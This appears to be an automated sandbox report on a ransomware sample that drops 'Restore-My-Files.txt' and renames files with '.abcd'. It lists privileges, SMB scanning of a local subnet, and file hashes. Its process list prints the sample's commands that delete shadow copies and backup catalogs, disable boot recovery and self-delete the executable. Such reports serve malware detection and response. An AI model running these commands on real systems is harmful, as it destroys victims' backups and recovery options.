| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe
"C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled No
C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
C:\Windows\SYSTEM32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP
C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
C:\Windows\SYSTEM32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled No
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP
C:\Windows\SYSTEM32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled No
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP
C:\Windows\SYSTEM32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled No
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP
C:\Windows\SYSTEM32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled No
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP
C:\Windows\SYSTEM32\wbadmin.exe
wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 20 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe"
C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 20
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| N/A | 10.127.0.254:445 | tcp | |
| N/A | 10.127.0.236:445 | tcp | |
| N/A | 10.127.0.243:445 | tcp | |
| N/A | 10.127.0.201:445 | tcp | |
| N/A | 10.127.0.226:445 | tcp | |
| N/A | 10.127.0.233:445 | tcp | |
| N/A | 10.127.0.222:445 | tcp | |
| N/A | 10.127.0.229:445 | tcp | |
| N/A | 10.127.0.223:445 | tcp | |
| N/A | 10.127.0.209:445 | tcp | |
| N/A | 10.127.0.240:445 | tcp | |
| N/A | 10.127.0.237:445 | tcp | |
| N/A | 10.127.0.218:445 | tcp | |
| N/A | 10.127.0.190:445 | tcp | |
| N/A | 10.127.0.206:445 | tcp | |
| N/A | 10.127.0.198:445 | tcp | |
| N/A | 10.127.0.193:445 | tcp | |
| N/A | 10.127.0.246:445 | tcp | |
| N/A | 10.127.0.242:445 | tcp | |
| N/A | 10.127.0.234:445 | tcp | |
| N/A | 10.127.0.213:445 | tcp | |
| N/A | 10.127.0.244:445 | tcp | |
| N/A | 10.127.0.241:445 | tcp | |
| N/A | 10.127.0.230:445 | tcp | |
| N/A | 10.127.0.228:445 | tcp | |
| N/A | 10.127.0.239:445 | tcp | |
| N/A | 10.127.0.249:445 | tcp | |
| N/A | 10.127.0.245:445 | tcp | |
| N/A | 10.127.0.248:445 | tcp | |
| N/A | 10.127.0.247:445 | tcp | |
| N/A | 10.127.0.254:139 | tcp | |
| N/A | 10.127.0.235:445 | tcp | |
| N/A | 10.127.0.196:445 | tcp | |
| N/A | 10.127.0.194:445 | tcp | |
| N/A | 10.127.0.231:445 | tcp | |
| N/A | 10.127.0.234:139 | tcp | |
| N/A | 10.127.0.233:139 | tcp | |
| N/A | 10.127.0.220:445 | tcp | |
| N/A | 10.127.0.210:445 | tcp | |
| N/A | 10.127.0.235:139 | tcp | |
| N/A | 10.127.0.231:139 | tcp | |
| N/A | 10.127.0.230:139 | tcp | |
| N/A | 10.127.0.229:139 | tcp | |
| N/A | 10.127.0.228:139 | tcp | |
| N/A | 10.127.0.226:139 | tcp | |
| N/A | 10.127.0.222:139 | tcp | |
| N/A | 10.127.0.223:139 | tcp | |
| N/A | 10.127.0.220:139 | tcp | |
| N/A | 10.127.0.249:139 | tcp | |
| N/A | 10.127.0.247:139 | tcp | |
| N/A | 10.127.0.248:139 | tcp | |
| N/A | 10.127.0.246:139 | tcp | |
| N/A | 10.127.0.244:139 | tcp | |
| N/A | 10.127.0.245:139 | tcp | |
| N/A | 10.127.0.243:139 | tcp | |
| N/A | 10.127.0.241:139 | tcp | |
| N/A | 10.127.0.242:139 | tcp | |
| N/A | 10.127.0.240:139 | tcp | |
| N/A | 10.127.0.239:139 | tcp | |
| N/A | 10.127.0.237:139 | tcp | |
| N/A | 10.127.0.236:139 | tcp | |
| N/A | 10.127.0.218:139 | tcp | |
| N/A | 10.127.0.213:139 | tcp | |
| N/A | 10.127.0.232:445 | tcp | |
| N/A | 10.127.0.215:139 | tcp | |
| N/A | 10.127.0.208:445 | tcp | |
| N/A | 10.127.0.210:139 | tcp | |
| N/A | 10.127.0.209:139 | tcp | |
| N/A | 10.127.0.208:139 | tcp | |
| N/A | 10.127.0.206:139 | tcp | |
| N/A | 10.127.0.201:139 | tcp | |
| N/A | 10.127.0.198:139 | tcp | |
| N/A | 10.127.0.197:445 | tcp | |
| N/A | 10.127.0.197:139 | tcp | |
| N/A | 10.127.0.196:139 | tcp | |
| N/A | 10.127.0.193:139 | tcp | |
| N/A | 10.127.0.217:445 | tcp | |
| N/A | 10.127.0.194:139 | tcp | |
| N/A | 10.127.0.190:139 | tcp | |
| N/A | 10.127.0.211:139 | tcp | |
| N/A | 10.127.0.207:139 | tcp | |
| N/A | 10.127.0.238:139 | tcp | |
| N/A | 10.127.0.219:139 | tcp | |
| N/A | 10.127.0.212:139 | tcp | |
| N/A | 10.127.0.191:139 | tcp | |
| N/A | 10.127.0.227:139 | tcp | |
| N/A | 10.127.0.250:445 | tcp | |
| N/A | 10.127.0.224:445 | tcp | |
| N/A | 10.127.0.221:445 | tcp | |
| N/A | 10.127.0.214:139 | tcp | |
| N/A | 10.127.0.192:139 | tcp | |
| N/A | 10.127.0.195:139 | tcp | |
| N/A | 10.127.0.204:139 | tcp | |
| N/A | 10.127.0.203:139 | tcp | |
| N/A | 10.127.0.200:139 | tcp | |
| N/A | 10.127.0.202:139 | tcp | |
| N/A | 10.127.0.199:139 | tcp | |
| N/A | 10.127.0.205:139 | tcp | |
| N/A | 10.127.0.232:139 | tcp | |
| N/A | 10.127.0.221:139 | tcp | |
| N/A | 10.127.0.224:139 | tcp | |
| N/A | 10.127.0.250:139 | tcp | |
| N/A | 10.127.0.217:139 | tcp | |
| N/A | 10.127.0.238:445 | tcp | |
| N/A | 10.127.0.227:445 | tcp | |
| N/A | 10.127.0.219:445 | tcp | |
| N/A | 10.127.0.215:445 | tcp | |
| N/A | 10.127.0.205:445 | tcp | |
| N/A | 10.127.0.203:445 | tcp | |
| N/A | 10.127.0.202:445 | tcp | |
| N/A | 10.127.0.200:445 | tcp | |
| N/A | 10.127.0.212:445 | tcp | |
| N/A | 10.127.0.204:445 | tcp | |
| N/A | 10.127.0.195:445 | tcp | |
| N/A | 10.127.0.214:445 | tcp | |
| N/A | 10.127.0.211:445 | tcp | |
| N/A | 10.127.0.207:445 | tcp | |
| N/A | 10.127.0.199:445 | tcp | |
| N/A | 10.127.0.192:445 | tcp | |
| N/A | 10.127.0.191:445 | tcp | |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 247.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | iplo.ru | udp |
Files
C:\Users\Admin\Desktop\resultlog7.reg
| MD5 | f7ca3a0229a943613048db40dd449ae0 |
| SHA1 | 96215a094dbe5b43a5bf2cffa76f9066e64d6bf0 |
| SHA256 | 871349ba4f0dbd77a2f1ad4558287c099e37245cc3787ecbf9b7aa80735af781 |
| SHA512 | e3dbc731cb4598a72c429d4c95c3931bb45d690980720c48430d1640f1dcbc7734b1b7b49d758045d4386722211aca14e698be71bfc480eea1cc62bcb5ef17b8 |
C:\Program Files\Common Files\DESIGNER\Restore-My-Files.txt
| MD5 | 85b284f91f6c75f1d486b3aeca58aa8b |
| SHA1 | f34f526438498a9b8b428f301a43ff1c0aa9aba0 |
| SHA256 | 6073a259152cf1e1c12e9fb779c935ac7d83f4d42fd9baf7dabdf580f18b4c71 |
| SHA512 | 5f37c6518233905f8ed96bb441808ce96cc6a7f6d1779a0baca5187035b1106f9632e8ea8cf6081774944a281847d222b11750b30d731f6f52d627c1ac8fcd63 |
C:\Users\Admin\Desktop\resultlog7.reg
| MD5 | e3def1aeb3036983338f7b3fa4ec0683 |
| SHA1 | 40832dff31521c120445814091a199215257276c |
| SHA256 | 2e3434fdc5749e3c10bba159afdaa5551611472a300d39c7f43f222077f8a631 |
| SHA512 | 67b125881f50fd8e0c6f5684f85bbc2b38bc4f8a143643648171d495a0aed71991320d7d8e00b206f1ee64c2f0d8c876427c9e4a613534ce8f9a588cb0632513 |
C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\Manifest.xml
| MD5 | c3903fcbbb55d1e6512bfe2dad23b1f8 |
| SHA1 | dfa08eaa2acfbfff3c95edc424859b5314cd570e |
| SHA256 | a55e2712416afc3afc95dbfa7ea28eaf5c0bdf35f76acb66e0cc2b42edf3f86b |
| SHA512 | bbf6ee4470e1ffff364a1d4e68ca693f124e5d8ffa58386342791f35fef1f0720e7b3b46b0a1e187a8328eb12fea70afab271ae8b445daa653e33a9dd3d7c97c |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml.abcd
| MD5 | a0a8e9cd42d222f26faa37ae63a7cc34 |
| SHA1 | 86f72401ec1c3bc7c674e4d565fd49ce7c8dd7a0 |
| SHA256 | fb061301ec1507f21e163db14134d78ab75bbdcc7c40fa1873c1635833df1bb4 |
| SHA512 | 12a1d97bf1006b082ac9c32ab720519b776eb3f9ce691716e4e8683635db4ec0a4c72b6b40fd2f24a58c3ca0c4564a5a98b1d44d927beb1e0d81ad03fa98a8a6 |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\wordEtw.man.abcd
| MD5 | 5e428d2a954d3d1a439d2c7135e2013f |
| SHA1 | 32beacbddfd289474ec6b887f7bfac8bbbab243e |
| SHA256 | f9790994367b671b3e63a67ef74a1f55cf43dcfbdc7839d99a9d2e6202f5a6dd |
| SHA512 | de6becfbe09ca080222845af2142fb444408874ff32f3640c4dde71f246d5173e0e0beb4d635c5c540ca07f053140661236bac10c0718141fa93acb0ff8b6681 |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.excelmui.msi.16.en-us.xml.abcd
| MD5 | 3077d3295e5dbc3c25303f30aa26d766 |
| SHA1 | fb42c93fd2f14823a46e5d04b4339607260d364f |
| SHA256 | a0ed9f49757806dda2dbc3f7cc485ee6b816b92b930dfaf72ff452ef20e0e2dd |
| SHA512 | 6a33ec82d3fcc907a72d2d68e8fd3dc0542421da91e943478bb475f1eaae9a8da911d95637616d5024cf7b1ec021a962180d3bfc788937a3eb1ba10f7d98f104 |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.officemuiset.msi.16.en-us.xml.abcd
| MD5 | ee4610ff1b3f8ed535a4cd9ddd992cf6 |
| SHA1 | 35235b2b1c410cc9b7c8564d2c726f5562491c88 |
| SHA256 | 720a4344725ea5ad02e085f45f5484fe889cd07a3726a3cae4b590edb9710149 |
| SHA512 | c71928a6b9042d6581d405808facfd98e2fa2408376438762ede6e6ee323ed8546ed803a258a2a3d5d4ba37516f5c355d6b4cbeafbd7fdd1efe7b5a53796b0fa |
C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.jfm.abcd
| MD5 | 8ee736bd2b1b957e53c5336daf2be377 |
| SHA1 | aacb621012449d0723787dcec05d42cf4778f137 |
| SHA256 | 350af938a1301e4807d030288a1152f4c387ce5295bdb629afc7f22f47ab7cae |
| SHA512 | bb3f2cb3d6b438ecb752d82dc842c133340ceb8abbec30948b133187d33616dbe187126212eb988be4df4933e55791aebef9422006d87f7dfc852dbf8090335c |
C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm.abcd
| MD5 | 4b0c827d3834a6e0002e77e4ca5943ff |
| SHA1 | 497a64856d8b7a980cd56be28cb9f31282453a4b |
| SHA256 | 656226433ca32b5beb6c9c3ce31c119953373f2bdef63fa9a1133a63172b6868 |
| SHA512 | e934841e2211ca2280217e617a9b81fcb11beade95c9727f77e17f00b3458d2fc75592a984760a93a0d6dc1c5dd6ec801f4c867e584e8fe7735af6e79668034f |
C:\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft_Windows-10-Pro.swidtag.abcd
| MD5 | 23e95598eed0367b9aaf58deff248105 |
| SHA1 | 0018622680132e2cd8a5a606f68796a14bab8044 |
| SHA256 | 2b0599d5ec119b30a6d8ff9ad6a2e3751a249ee48bf506e9dec6bd36232baf16 |
| SHA512 | 4f7c497a8deb1550667a4197ccb4b8ece9e75a98099763d78de1bc511ff8cf214c126a10e0be68eeac6faed2bee21b7259c6371a649ca0ec58a8a52751e34e15 |
C:\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Localization Component.swidtag.abcd
| MD5 | 61446079faf97de48e6db754f5ff4131 |
| SHA1 | e64c29f27df1ee3aba0615c9cb07a7d64c24094b |
| SHA256 | c83c5c90203e4a6f0c663092605420095cc1c8f9a7fa3a802f74fbd937c40fcf |
| SHA512 | 050a060c583e12870d7717adf38b8c9e122418b81e6aee4c1f6501d612f14c2cd4193d9a7b399ee6b79a89cf61455edb39bf32ef9d3ddf5b4ccd6c8b26278e39 |
C:\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Licensing Component.swidtag.abcd
| MD5 | eca5c47da836f68564da86a1084b7c8d |
| SHA1 | a1083f7cd9104246c6c3b90a4fb083ad39bd1479 |
| SHA256 | 231438c42c020300d7769ba20777543f4b11ae268340a62d6f344400a00576ce |
| SHA512 | 754b0f5ba3f98413561b63bcbefac30dddb7a55f9cefcbb1ef93553284404b9d47562084cd2da2415dbcf19dc4ddfbb120630263b3a046b011ecf266c59b6709 |
C:\ProgramData\regid.1991-06.com.microsoft\regid.1991-06.com.microsoft Office 16 Click-to-Run Extensibility Component.swidtag.abcd
| MD5 | 5325ee15c10fd8e846ff8d111a472152 |
| SHA1 | 1f7e8e38f4fe6dd61849e2a0483672c47291c4c3 |
| SHA256 | 3c0a578bb86149556bee44d7359ac06c2a5e37d82ace2861278140c2260cb03a |
| SHA512 | 28c82cd801c6eb96a21093408a1f427745a4d8641547bd61db0b80b9750dc2941cf29eb542fd2d03a09e9581dab0ebe4d380709b49835ddc6c27dc36dea83fa2 |
C:\ProgramData\Package Cache\{fb0500c1-f968-4621-a48b-985b52884c49}\state.rsm.abcd
| MD5 | 3a2669c5df9936bd0ef2ad6dde56eb7c |
| SHA1 | 2b786ed77fe00e30745e62fdb2da74ef57611484 |
| SHA256 | 41df57681de011709aef3e2fadc41b45ef87bb9f091f30983cfe3e0408997931 |
| SHA512 | a8af091178fda5d69aa53d6c49263c3e64643b107904d6abde3c6909477aec494e6b2ea7f4ab2e1f9d4ffad3d0ee99d86d608dabff74c22db4c68b2792b940f6 |
C:\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm.abcd
| MD5 | 7b9bdc9cbccda4595839620754bf02dd |
| SHA1 | 2c8465b1de0f84e67e6e79d15c5ead8308d0614a |
| SHA256 | 540b0db67eb26a7007d8e9b3ede7f7fcc7d5d9a32c6748b9536945ee07776ef9 |
| SHA512 | fe006a6506055d423de4b2df41833b3dc2b93cf01ae33e9109471d5fe76c585b5fb6a2a8331129a666aed268211f15971dd156a19edf8d55bd69f5385830c4d7 |
C:\ProgramData\Package Cache\{61087a79-ac85-455c-934d-1fa22cc64f36}\state.rsm.abcd
| MD5 | 5493c4967969eae9d8ff01606a048465 |
| SHA1 | 2ade4f719e52730267b6915593f196fbf65e61fb |
| SHA256 | 21c992aae4106885ace0962565d55946a67fb46588c667a077821eda03f8165f |
| SHA512 | 4e8adc17b0b3b0e3948503afb866b3b790273960759af172c6134afaff376ef751754443aabf49a3415de2c834c0bc07325a6976c6228b4641ba89812891ffb5 |
C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\state.rsm.abcd
| MD5 | 9ee0eae9059aab217910d36603ab9b49 |
| SHA1 | e755a3653232026e3d629438f51088657fda932e |
| SHA256 | 0b99b2958e9b4fff335a502b04692cbcac70e56e5263790193f5969193f25e3a |
| SHA512 | bb2bef050324cfae699fa8bf0363b83ca3a1ee6cf33faec908493dcc2c2a850661a8b737c4419e91bec736ffb9afed1aae91ffa4d1b6e26b78a879caab6a849b |
C:\ProgramData\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\state.rsm.abcd
| MD5 | 7cc0f3bf6099ef5ff6ceb1e503d93411 |
| SHA1 | 5ea4d8187a7111e01c4a16dd27c485eee97d241e |
| SHA256 | cf180178c6e97823fb2d6b5241a673f346263816c55b98189e32826f8e33e1eb |
| SHA512 | f5285510ce5ab359ea7126c16c85b37918bb82b1329cf9baaf22b296d1561124361b68021e869c8067e26c5170e2e6aa1f056955d6219e5a0b14ef84ad264f8f |
C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\state.rsm.abcd
| MD5 | 7a825922cff186f57ddd5a2f77f307ce |
| SHA1 | 65cc8c7970ca34aad7bba0d87187195796e59cc3 |
| SHA256 | 568659c45fb95cb97363243dd1ad2664986c08ff612a6d05f77e7ef81029a91d |
| SHA512 | c462f9363f30b825d9547b2b7d3713c574b25f6e9e90549c08ee1451eca112a41f2689473b8a03aba1cdf83d807809b9580cd51fd7bdd4d29c924287c5e4edf9 |
C:\ProgramData\Package Cache\{17316079-d65a-4f25-a9f3-56c32781b15d}\state.rsm.abcd
| MD5 | 6135570474a58729f89f029304212b27 |
| SHA1 | 2dfd80e2668c622a885a11d00d6fbefb89159ea7 |
